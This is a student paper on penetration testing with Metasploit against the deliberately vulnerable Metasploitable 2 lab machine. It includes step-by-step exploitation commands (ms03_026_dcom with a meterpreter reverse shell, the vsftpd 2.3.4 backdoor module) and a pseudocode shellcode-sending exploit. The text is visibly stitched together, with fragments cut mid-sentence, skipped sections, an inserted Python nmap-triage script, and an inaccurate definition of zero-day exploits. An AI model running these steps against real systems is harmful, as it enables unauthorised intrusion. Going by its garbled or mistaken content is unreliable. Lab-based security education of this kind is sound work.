Penetration Testing and Metasploit
All content following this page was uploaded by Michael Moore on 26 July 2017.
Michael D. Moore
Computer Science Department
Jackson State University
Jackson, MS USA
dustan26@live.com
Abstract—In this paper, penetration testing in general will be discussed, as well as how to penetration test using Metasploit on Metasploitable 2. Metasploitable 2 is a vulnerable system that I chose to use, as doing this on any other system would be considered hacking and could have bad consequences. The main purpose of the research is to show the various tools used when trying to find vulnerabilities in a system. By using Metasploit to test a system, we can find the vulnerabilities that need to be fixed in order to better protect the system. Certain areas like network protocols, firewalls, and basic security issues will be explored in this research.

While there are a lot of different ways to do penetration testing, I have chosen to use Metasploit because of its broad uses and its simplicity. We have the option of either using the community version of the product, which is mostly automated, or using the command line within Metasploit. Both of these options will be explored in this paper. Alongside all of the tools used in Metasploit, I will show how to effectively find the vulnerabilities within a system of your choice. After going through all of the steps in this paper, anyone should be able to try and exploit any system they feel is vulnerable.

Keywords— vulnerabilities, Stuxnet, penetration testing, Metasploit, Metasploitable 2, pen-testing, exploits, Nmap, and Kali Linux.

I. INTRODUCTION

At the very beginning of the Internet, the world had a lot going for itself in terms of security, if you think about it as the fact that not many people had access to the Internet, so there were fewer attackers to deal with. Security wasn’t very important back then, but as the years moved on, we got real big real fast and have been playing catch-up ever since.

With new technology being made every year, we constantly have to come up with new ways to stop malicious activity within our systems. Not only do businesses need constant upkeep in security, but home professionals do as well, especially when dealing with servers. Security is so very important in our everyday lives. When people say they want security, what is probably heard is that they want a sense of security. It really makes sense if you think about it. Feeling secure isn’t necessarily the same thing as being secure. If everyone understood what kinds of dangers are out there, they would make real security their first priority.

Given the right environment and opportunity, anyone could use the skills they learn using programs like Metasploit to stop the malicious behavior of others. When people set out to make computer systems, they don’t initially consider every possible exploit available within them. There are a lot of moving parts when it comes to making a system, and it’s everyone’s job to explore all the options they have in order to provide a secure and safe system. This is where penetration testing tools come in handy.

When it comes to the security of computer systems, we can never leave anything to chance. All it takes is for one hacker trying to exploit a system to gain access to the personal and private data of its users and operators. By using the testing techniques described in this paper, people can get a jump on the bad guys looking to harm and infiltrate systems that do not belong to them.

The things that are put into this paper are only to be used in the appropriate manner and are in no way intended to lead one to become a hacker. The methods described are meant to help one who intends to learn certain goals that pertain to penetration testing of one’s own system or a system that you have permission for.

There are far too many people who are taking what they are learning and applying it in an unethical way, which creates havoc and attains a monetary gain. No one should take what they learn and use it against anyone in that manner.

II. PENETRATION TESTING

Penetration testing encapsulates many different things. Some of those things include Wifi, networks, software, and hardware systems. Most systems have some form of
vulnerabilities present when launched. These vulnerabilities are known as zero-day exploits. Zero-day exploits are usually either known by the companies, who just don’t think they’re bad enough to fix, or not known about at all. There are many issues with the interactions between software and hardware that can remain unknown for years before they are found, and some are never found because the issue has not presented itself.

Penetration testing can be defined as a means for a company or business to assess the vulnerabilities within its system at any given time. As systems change, like the addition of new software or hardware changes, more vulnerabilities can present themselves. The best way to try and stop these vulnerabilities from being found is to either hire someone full-time to constantly do penetration testing or, if money is tight, hire someone occasionally to do the testing.

Although penetration testing by professionals might not find every vulnerability in the system, it’s still necessary to make every effort possible against people who might try to test the system maliciously. Among the many reasons for doing penetration testing are financial responsibilities, security issues, and information protection[2]. If you were to do penetration testing on a system that is not yours, you should definitely make sure you get a right-to-hack and nondisclosure agreement signed[2].

When it comes to protecting computer systems, Metasploit is a good way to do that. Metasploit is only one of many penetration testing programs available in the world. By using this program, you will surely be able to quickly identify any vulnerability through the exploitation of the system, either manually (command line style) or automatically (secure web-based GUI type).

There are many different types of penetration testing tools available to explore. Metasploit, Kali Linux, Wireshark, w3af, John the Ripper, Nessus, Nmap, Dradis, and BeEF are a few of them[1]. Some of the various types of attacks that can be done on a system include Bluetooth, PC microphone, wifi (WPA-protected), and man-in-the-middle attacks[1]. Kali Linux is an operating system filled with various open source programs strictly developed with the hacker world in mind. It’s not an operating system to be taken lightly, as any illegal use of it could get you jailed if you were ever caught. The two main kinds of penetration testing are overt and covert[5]. Overt testing is when you have the complete cooperation of the owners of the systems you are testing, and covert testing is when you are basically testing the staff’s ability to figure out the exploits being done on the system[5].

Some of the other things to consider when having a business are the financial aspects. There are a lot of companies out there that are being crippled due to lack of testing or preparation. Sometimes it could be the result of trying to get the product out before it is ready. If that is the case, then one might consider giving the project another few weeks in order to make sure the bugs are all worked out, because putting software out into the world before it’s ready could result in catastrophic failure.

As companies become bigger over the years, we owe it to ourselves to conduct testing on all of the systems in order to show our products at their finest hour and not have to worry about the possible zero-day exploits that have been left behind. Shown below is just one person’s estimated damage report due to cyber crimes that could have been prevented if maintenance on the systems had been done.

[Figure: estimated damage report due to cyber crimes. Source[2].]

III. METASPLOITABLE 2

Metasploitable 2 is the system that is being used in the research. It is a Linux-based OS that is made distinctively with Metasploit in mind, to be exploited by its users. It is available to download on the Metasploit website for anyone who wishes to do penetration testing. Although I could use any penetration testing program I wish, I will be using Metasploit as discussed previously.

In order to set up the vulnerable machine, you need to download it from the website (www.metasploit.com) and open the virtual machine file inside a virtual box of your choice. After having done these steps, you are on your way to testing the vulnerabilities of this system and also on your way to becoming a penetration tester. All you then need to do is enter msfadmin for the username and password and you will be connected shortly. Even though this is just a test system, it has all the capabilities of any operating system that one would wish to test in the future.
A. METHODS AND METHODOLOGIES

Some of the methods and methodologies that are being used include such things as the Open Web Application Security Project and the Open Source Security Testing Methodology Manual[8]. Not all methods need to be used for every application. Some are only designed to be used for certain things. These methods are still integrated into today’s standards. The Open Source Security Testing Methodology Manual can be used in places like physical security, human factors, wireless communication, telecommunication, data networks and operating systems[8]. Using something like Kali Linux can provide many uses such as SQL injection, database security audit, network traffic eavesdropping/tampering, network infrastructure attack, network stress testing, denial of service attacks, manipulation of user data, and web application testing[8].

    exploit_def()
      connection()
      exploit_preamble = "\x00\x00\x01"
      version_find = probing_ver()
      if (version equals 5)
        attack_payload = prepare_payload5()
      else
        attack_payload = prepare_payload4()
      end
      exploit_preamble << payload_length
      socket.put(exploit_preamble)    // Reqd by the protocol
      socket.get_once()
      socket.put(attack_payload)      // sending the attack payload
      socket.get_once()
      ...                             # triggering vulnerability
    end
    def prepare_payload5()
      attack_payload = shellcode
      attack_payload << rand_alpha(payload.length)
      attack_payload << "\x010" + [-117].pack("X")

security issues. There are tons of PLCs around the world, and to think a worm like this one can affect any network like this is very scary. “There are two main phases of Stuxnet worm: first is ‘propagation phase’ which is the characteristic of each worm and second one is ‘injection phase’. In first phase, Stuxnet worm propagates in local area network and update its files through peer to peer communication. In second phase when it finds its actual target i-e Siemens WinCC control and monitoring system connected to PLC it starts functioning and deviates them from their normal behavior[13]”.

Here is where the good stuff starts: some of the basics of how to access the console to do some manual exploitation of some systems. This process will show one example of an exploit of a certain system, not necessarily Metasploitable 2.

1. One of the first steps is to open the console itself and enter msfadmin for the username and the password[4].
2. Next, you need to figure out what system and exploit you wish to do[4].
3. Once you have that figured out and you have gotten the IP address of the system, you enter Nmap and then the IP address. The console will map the ports of the system to see which ports are open[4].
4. With the open port in hand, we enter show commands and find an exploit in the list that deals with remote pc[4].
5. “To get more information regarding the exploit you can use the command, ‘info exploit/windows/dcerpc/ms03_026_dcom’[4]”.
6. Then, we need to enter use/”exploit” into the console[4].
7. Once that’s finished loading, we are going to need to enter show options to find out what to do next to get the exploit going further[4].
8. Next, we need to enter the IP address (set RHOST ”ip address”) we wish to exploit, and find the payload to push onto the open port[4].
9. We need to enter show payloads to find compatible payloads for this exploit[4].
10. "set PAYLOAD windows/meterpreter/reverse_tcp" needs to be entered now into the console and then "set LHOST 192.168.42.128"[4].
11. Now enter the check command to see if the “machine vulnerable to the exploit or not” and if not just move on with the command exploit to perform the exploit[4].
12. If everything works like it’s supposed to, you should gain access to the system and be able to do anything you want on the system.

C. Metasploit Community

This version is a lot simpler to use since it is automated. When you download Metasploit, it comes with this option, which is done in your browser using your computer as the local host, which does all of the exploiting. Metasploit Community was mainly invented to help bridge the gap between everyday penetration testers and people looking to do the testing without really understanding every aspect of it. Although using the Community version seems faster, you still need to read up on all of the different techniques to be efficient at the testing.

7. Just like with the manual version, after gaining access, you have free roam on the system you now control.

D. Common Exploits Known

1. VSFTP Backdoor: This exploit allows the user to gain access to the shell via a backdoor that was made in 2011 and removed shortly thereafter.
2. MS08-067: This vulnerability relates to remote PC entry given a certain request is entered[5].

VSFTP Backdoor instructions[7]:
1. Login to the msf console.
2. Find your IP address.
3. Obtain the IP address from the Metasploitable 2 machine or whatever system you are exploiting.
4. Next, the user will then enter nmap -sS -sV -O (Metasploitable 2 IP address). This will provide you with everything you can know about the ports on that particular system.
5. Enter “search vsftp”[7].
6. Enter “use exploit/unix/ftp/vsftpd_234_backdoor”[7].
7. Enter “show options”[7].
8. Enter “set RHOST IPAddressofMachineExploiting”[7].
9. Finally enter “exploit”.
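As an added example that is not part of the paper, the following Python script shows the defender’s side of the nmap step in both the console walkthrough (step 3) and the VSFTP Backdoor instructions (step 4): it parses the port table from nmap -sV output (a constructed sample is embedded) and flags any service whose reported version is on a known-bad list, such as the backdoored vsftpd 2.3.4 release that the vsftpd_234_backdoor module targets, so the host can be patched before anyone else scans it. The sample scan output, the KNOWN_BAD table and the function names are assumptions of this example.

```python
import re

# Constructed sample of "nmap -sS -sV -O" normal output for a
# Metasploitable 2 style host; illustrative values, not a captured scan.
SAMPLE_NMAP_OUTPUT = """\
Starting Nmap 7.40 ( https://nmap.org )
Nmap scan report for 192.168.42.129
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
8787/tcp open  unknown
"""

# (service, version) pairs a defender treats as "patch now" (assumed table).
# The vsftpd entry is the backdoored 2.3.4 release the paper's
# exploit/unix/ftp/vsftpd_234_backdoor module targets.
KNOWN_BAD = {
    ("ftp", "vsftpd 2.3.4"): "backdoored vsftpd 2.3.4 release (2011); upgrade the package",
}

# One port line of nmap's normal output: port/proto, state, service, version (optional).
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")


def parse_nmap_ports(text):
    """Return one dict per port line; 'version' is '' when nmap printed none."""
    rows = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if m:
            port, proto, state, service, version = m.groups()
            rows.append({"port": int(port), "proto": proto, "state": state,
                         "service": service, "version": version.strip()})
    return rows


def triage(rows):
    """Map each open port to a finding: a known-bad version, or a service
    nmap could not identify (no banner) that needs a manual look."""
    findings = []
    for r in rows:
        if r["state"] != "open":
            continue
        key = (r["service"], r["version"])
        if key in KNOWN_BAD:
            findings.append((r["port"], "KNOWN_BAD", KNOWN_BAD[key]))
        elif r["service"] == "unknown" or not r["version"]:
            findings.append((r["port"], "UNIDENTIFIED", "no version banner; inspect manually"))
    return findings


if __name__ == "__main__":
    for port, level, note in triage(parse_nmap_ports(SAMPLE_NMAP_OUTPUT)):
        print(f"{port:>5}  {level:<12} {note}")
```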
VII. CONCLUSION

There are a lot of penetration testing programs out there, and Metasploit just so happens to be the best one that I could think of to share with you. It has a lot of nice options and you can use it either manually or automatically. Although the reasons for and against the two have already been shown throughout the paper, I’d like to reiterate a few things. By doing all the exploiting manually, you are able to control the way you try to exploit a given system; it just might take a little bit longer. Penetration testing is just one of the multiple ways to make sure the information on your systems is secure and not open to hacking. When you plan on doing penetration testing, I suggest you give Metasploit a shot and you won’t be disappointed. When looking into what programs are available to use across the Internet, there are a lot of different options to choose from. If you are not careful with any of the programs, you could land yourself in some serious trouble.

REFERENCES

http://searchsecurity.techtarget.com/tip/Using-Metasploit-for-real-world-security-tests. [Accessed: 15-Apr-2017].
[11] D. Dodd, “Penetration Testing and Shell Tossing with Meta... » ADMIN Magazine,” ADMIN Magazine. [Online]. Available: http://www.admin-magazine.com/Articles/Pen-Test-Tips. [Accessed: 17-Apr-2017].
[12] “Hack the Fartknocker VM (CTF Challenge),” Hacking Articles, 06-Apr-2017. [Online]. Available: http://www.hackingarticles.in/hack-fartknocker-vm-ctf-challenge/. [Accessed: 18-Apr-2017].
[13] R. Masood, U.-E.-G., and Z. Anwar, “SWAM: Stuxnet Worm Analysis in Metasploit,” 2011 Frontiers of Information Technology, 2011.